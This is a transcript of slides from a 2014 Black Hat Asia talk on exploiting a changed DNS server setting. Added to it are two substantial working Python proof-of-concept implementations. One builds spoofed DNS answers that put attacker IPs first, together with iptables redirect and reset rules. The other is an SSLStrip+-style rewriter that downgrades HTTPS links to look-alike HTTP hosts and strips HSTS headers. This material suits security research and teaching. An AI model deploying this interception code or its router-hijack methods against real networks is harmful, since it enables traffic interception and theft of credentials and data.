
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014


Effectively exploiting a change of the DNS server configured on a computer (via router hacking or some other way...)

Published in: Internet


  1. OFFENSIVE: Exploiting changes on DNS server configuration. Leonardo Nve Egea, lnve@s21sec.com, @leonardonve
  2. About me: Security researcher since... (a long time) in Spain. Pentester, incident investigator and security researcher. On the offensive side (more fun). I love the protocol level.
  3. INTRODUCTION
  4. What.
  5. Why.
  6. EXPLOITATION (I): NORMAL PROCEDURE
  7. How: CSRF/XSS. Insufficient authorization. SNMP/TFTP. Default password + external administration. Cracking Wi-Fi passwords + default password. Command-line DNS change. Rogue DSLAM. Malware.
  8. What.
  9. Tools: Metasploit. Dnsmasq. BIND server.
  10. Then: Invisible proxy (Burp Suite, mitmproxy). SSLstrip. HTML injection (BeEF, exploit kits). Bouncing to known servers (SSLsplit). Fake web servers (defacing, phishing). Sniffing data.
  11. OBSTACLES OF NORMAL EXPLOITATION
  12. Obstacles: SSL certificates (critical).
  13. Obstacles: SSL certificate pinning / EMET (critical).
  14. Obstacles: HSTS + preloaded HSTS sites (non-critical).
  15. Obstacles: SSH host key verification failure (critical).
  16. Obstacles: POP3/SMTP banner (non-critical problem). FTP banner (this can be critical). Limited host interception. Limited protocol interception.
  17. Limitations: Limited host interception. Time needed to study the IP communication patterns. Limited cleartext protocol interception. HTTPS. Accepting the loss of a lot of information.
  18. EXPLOITATION (II): IMPROVING THE ATTACK PROCEDURE
  19. Objectives: Discretion. Improve data acquisition from time 0.
  20. Improve the attack: a DNS feature meant for high availability and load balancing, several A records in a single answer, which the client tries in order.
  21. Improve the attack (sequence diagram): DHCP REQ from the victim; DHCP RESP with a fake DNS server. DNS A request from the victim, relayed by the attacker as a DNS A request to the real resolver; DNS response from the real resolver; DNS response to the victim = IP of attacker server 1 + IP of attacker server 2 + the real DNS response, with a short TTL. Then, per connection: a SYN to port xxx on an attacker IP is answered with RST ACK, so the client retries the SYN against the next IP; or the attacker accepts (SYN ACK), opens its own SYN / SYN ACK to the real server, and DATA flows in both directions through the attacker.
  22. Improve the attack: On port 80 the attacker can put an invisible proxy. The attacker can always reject SSL ports, because the client will then connect to the real server. Data of other connections is forwarded through the evil server from the first moment. And there is a tool.
  23. Tool: dns2proxy (still in beta). Written entirely in Python (PyDNS). Permits spoofing, direct forwarding, and adding IPs to the response. Interacts directly with iptables to forward connections. https://github.com/LeonardoNve/dns2proxy
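The answer crafting behind slides 20 to 23, as an added example written for this page (it is not dns2proxy's code): an A response that lists the attacker's addresses before the real ones with a short TTL, plus the host-side iptables policy that makes the client fall through to the real server on 443 and hit the invisible proxy on 80. It uses only the standard library; the transaction id, host name and IP addresses in the test are constructed values, and the iptables layout is an assumption about how one would wire it, not the tool's own rules.

```python
# Added example (not dns2proxy's code): craft the "attacker IPs first, real
# IPs after" DNS answer from the slides.  Standard library only.
import socket
import struct

A_RECORD = 1


def build_query(txid: int, name: str, qtype: int = A_RECORD) -> bytes:
    """Build a minimal single-question DNS query (used to construct test input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, 1 question
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def parse_query(packet: bytes):
    """Return (txid, qname, qtype, raw question section) of a one-question packet."""
    txid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount != 1:
        raise ValueError("only single-question queries are handled")
    pos, labels = 12, []
    while packet[pos] != 0:
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    pos += 1  # skip the root label
    qtype, _qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return txid, ".".join(labels), qtype, packet[12:pos + 4]


def build_response(query: bytes, attacker_ips, real_ips, ttl: int = 5) -> bytes:
    """Answer an A query with the attacker IPs first, then the real ones.

    Clients try the addresses in order: if the attacker host resets a port
    (e.g. 443) the client moves on to the real server; on other ports the
    attacker accepts and forwards.  The short TTL keeps the client asking
    the rogue resolver again soon.
    """
    txid, _name, qtype, question = parse_query(query)
    if qtype != A_RECORD:
        raise ValueError("this PoC only spoofs A records")
    answers = list(attacker_ips) + list(real_ips)
    # flags 0x8180: response, recursion desired + available, NOERROR
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), 0, 0)
    rrs = b"".join(
        # 0xC00C is a compression pointer back to the question name
        struct.pack("!HHHIH", 0xC00C, A_RECORD, 1, ttl, 4) + socket.inet_aton(ip)
        for ip in answers)
    return header + question + rrs


def parse_response(packet: bytes):
    """Return (txid, [(ip, ttl), ...]) from a response built by build_response."""
    txid, _flags, _qd, ancount = struct.unpack("!HHHH", packet[:8])
    _, _, _, question = parse_query(packet)
    pos = 12 + len(question)
    records = []
    for _ in range(ancount):
        _ptr, _rtype, _rclass, rttl, rdlen = struct.unpack("!HHHIH", packet[pos:pos + 12])
        pos += 12
        records.append((socket.inet_ntoa(packet[pos:pos + rdlen]), rttl))
        pos += rdlen
    return txid, records


def iptables_rules(proxy_port: int = 8080):
    """Assumed host-side policy matching slide 22 (not dns2proxy's own rules):
    port 80 goes to the invisible proxy, 443 is reset so the client falls back
    to the real server; the remaining ports are left to the forwarding logic,
    which must know the real destination for each connection."""
    return [
        f"iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports {proxy_port}",
        "iptables -A INPUT -p tcp --dport 443 -j REJECT --reject-with tcp-reset",
    ]
```

Whether the client really moves to the next address after a RST depends on the client: browsers and most `getaddrinfo` loops do, single-address clients do not, which is why the slides call interception of some hosts and protocols "limited".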
  24. Improve the attack.
  25. DEMO (or video, in case of demo effect ;)
  26. Previous limitations: Limited host interception. Time needed to study the IP communication patterns. Limited cleartext protocol interception. HTTPS. Accepting the loss of a lot of information.
  27. SSLStrip vs HSTS.
  28. Common SSLStrip usage.
  29. Obstacles: HSTS + preloaded HSTS sites (non-critical).
  30. SSLStrip+ to defeat HSTS: Strict Transport Security is keyed on domain names, predefined (preloaded) or learned. Change HTTPS to HTTP. Also change the domain names the client connects to, based on predefined rules. The DNS server can resolve those rewritten names based on the same predefined rules. https://github.com/LeonardoNve/sslstrip2.git
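The rewrite step from slide 30 and the DNS side that undoes it, as an added example written for this page (not sslstrip2's or dns2proxy's code). The prefix rules (`www.` to `wwww.`, otherwise a `web` prefix) are assumed for illustration, not the tools' exact table; the page content and headers in the test are constructed. The last function shows why the trick works against a per-host HSTS entry and fails against one with includeSubDomains.

```python
# Added example (not sslstrip2's or dns2proxy's code): downgrade https:// links
# to http:// on a look-alike host name the browser has no HSTS entry for, and
# map that name back to the real host on the DNS side.  Prefix rules assumed.
import re

HTTPS_HOST = re.compile(r"https://([A-Za-z0-9.-]+)")


class HstsBypassRewriter:
    def __init__(self):
        self.spoofed = {}  # spoofed host -> real host, filled as links are rewritten

    def spoof_host(self, host: str) -> str:
        """Derive a name outside the browser's HSTS entry for `host` (assumed rules)."""
        fake = "wwww." + host[4:] if host.startswith("www.") else "web" + host
        self.spoofed[fake] = host
        return fake

    def real_host(self, host: str) -> str:
        """DNS side: resolve a spoofed name to the host it stands for.

        The table of names we issued is consulted first; the stateless reversal
        of the rules is the fallback a separate DNS process would have to use.
        """
        if host in self.spoofed:
            return self.spoofed[host]
        if host.startswith("wwww."):
            return "www." + host[5:]
        if host.startswith("web"):
            return host[3:]
        return host

    def rewrite_body(self, body: str) -> str:
        """SSLStrip+ step: https://host -> http://spoofed-host in page content."""
        return HTTPS_HOST.sub(lambda m: "http://" + self.spoof_host(m.group(1)), body)

    def rewrite_headers(self, headers: dict) -> dict:
        """Drop HSTS and downgrade Location redirects on the response to the victim."""
        out = {}
        for name, value in headers.items():
            if name.lower() == "strict-transport-security":
                continue
            if name.lower() == "location":
                value = self.rewrite_body(value)
            out[name] = value
        return out


def hsts_applies(entry_host: str, include_subdomains: bool, host: str) -> bool:
    """An HSTS entry covers only its exact host unless includeSubDomains is set,
    which preloaded entries usually are; then the look-alike is still upgraded."""
    return host == entry_host or (include_subdomains and host.endswith("." + entry_host))
```

The stateless fallback is ambiguous: a genuine `webmail.example.org` that was never spoofed would be reversed to `mail.example.org`, which is why the issued-name table is checked first. And because `wwww.example.com` is still a subdomain of `example.com`, a preloaded `example.com` entry with includeSubDomains (the common case for preloaded sites) is not bypassed by this trick, matching the slides' "non-critical" grading of the obstacle rather than "solved".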
  31. DEMO (or video, in case of demo effect...)
  32. SSL in general: you must take advantage of other factors/vulnerabilities.
  33. More possibilities: Downgrade attacks. JavaScript infections. For decoding ciphered protocols, go there: http://media.blackhat.com/bh-us-12/Briefings/Alonso/BH_US_12_Alonso_Owning_Bad_Guys_Slides.pdf
  34. UDP? With UDP the application, not the OS, has control over the communication. If the application resends a lost UDP packet, we have it! If not... dns2proxy is a PoC and only handles TCP, but it is really easy to extend it to UDP too.
  35. Other scenario.
  36. Conclusions: Improve DNS server configuration hijacks with two tools. Much more information captured than with typical attacks. Old protocols: old security. New protocols + old protocols: old security+. Solutions... DNSSEC (which only helps when the client itself validates signatures; a stub resolver that blindly trusts the rogue server gains nothing from it).
  37. THANKS. Miguel Hernandez, the man who first thought "Let's put a default password. Then they can change it."
